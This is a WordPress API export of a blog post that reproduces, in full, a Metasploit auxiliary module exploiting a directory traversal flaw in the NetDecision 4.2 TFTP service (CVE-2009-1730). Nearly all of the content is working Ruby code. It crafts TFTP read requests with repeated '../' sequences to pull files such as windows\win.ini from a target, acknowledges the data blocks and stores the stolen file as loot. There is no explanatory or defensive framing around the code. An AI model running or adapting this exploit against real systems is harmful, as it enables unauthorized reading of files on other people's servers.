{"id":59329,"date":"2024-09-01T03:00:14","date_gmt":"2024-09-01T00:00:14","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180940\/netdecision_tftp.rb.txt"},"modified":"2024-09-01T03:00:14","modified_gmt":"2024-09-01T00:00:14","slug":"netdecision-4-2-tftp-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/netdecision-4-2-tftp-directory-traversal\/","title":{"rendered":"NetDecision 4.2 TFTP Directory Traversal"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report<\/p>\n

def initialize(info={})
super(update_info(info,
‘Name’ => “NetDecision 4.2 TFTP Directory Traversal”,
‘Description’ => %q{
This modules exploits a directory traversal vulnerability in NetDecision 4.2
TFTP service.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Rob Kraus’, # Vulnerability discovery
‘juan vazquez’ # Metasploit module
],
‘References’ =>
[
[‘CVE’, ‘2009-1730’],
[‘OSVDB’, ‘54607’],
[‘BID’, ‘35002’]],
‘DisclosureDate’ => ‘2009-05-16’
))<\/p>\n

register_options(
[
Opt::RPORT(69),
OptInt.new(‘DEPTH’, [false, “Levels to reach base directory”,1]),
OptString.new(‘FILENAME’, [false, ‘The file to loot’, ‘windows\\\\win.ini’]),
])
end<\/p>\n

def run_host(ip)<\/p>\n

# Configure how deep we want to traverse
depth = (datastore[‘DEPTH’].nil? or datastore[‘DEPTH’] == 0) ? 10 : datastore[‘DEPTH’]# Prepare the filename
file_name = “..\/” * depth
file_name << datastore[‘FILENAME’]\n

# Prepare the packet
pkt = “\\x00\\x01”
pkt << file_name
pkt << “\\x00”
pkt << “octet”
pkt << “\\x00”<\/p>\n

# We need to reuse the same port in order to receive the data
udp_sock = Rex::Socket::Udp.create(
{
‘Context’ => {‘Msf’ => framework, ‘MsfExploit’=>self}
}
)<\/p>\n

add_socket(udp_sock)<\/p>\n

# Send the packet to target
file_data = ”
udp_sock.sendto(pkt, ip, datastore[‘RPORT’].to_i)<\/p>\n

while (r = udp_sock.recvfrom(65535, 0.1) and r[1])<\/p>\n

opcode, block, data = r[0].unpack(“nna*”) # Parse reply
if opcode != 3 # Check opcode: 3 => Data Packet
print_error(“Error retrieving file #{file_name} from #{ip}”)
return
end
file_data << data
udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack<\/p>\n

end<\/p>\n

if file_data.empty?
print_error(“Error retrieving file #{file_name} from #{ip}”)
return
end<\/p>\n

udp_sock.close<\/p>\n

# Output file if verbose
vprint_line(file_data.to_s)<\/p>\n

# Save file to disk
path = store_loot(
‘netdecision.tftp’,
‘application\/octet-stream’,
ip,
file_data,
datastore[‘FILENAME’])<\/p>\n

print_status(“File saved in: #{path}”)
end<\/p>\n

#
# Returns an Acknowledgement
#
def tftp_ack(block=1)<\/p>\n

pkt = “\\x00\\x04” # Ack
pkt << [block].pack(“n”) # Block Id<\/p>\n

end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Report def initialize(info={})super(update_info(info,‘Name’ => “NetDecision 4.2 TFTP Directory Traversal”,‘Description’ => %q{This modules exploits a directory traversal vulnerability in NetDecision 4.2TFTP service.},‘License’ => MSF_LICENSE,‘Author’ =>[‘Rob Kraus’, # Vulnerability discovery‘juan vazquez’ # Metasploit module],‘References’ =>[[‘CVE’, ‘2009-1730’],[‘OSVDB’, ‘54607’],[‘BID’, ‘35002’]],‘DisclosureDate’ => ‘2009-05-16’)) register_options([Opt::RPORT(69),OptInt.new(‘DEPTH’, [false, “Levels …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59329","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59329"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59329\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}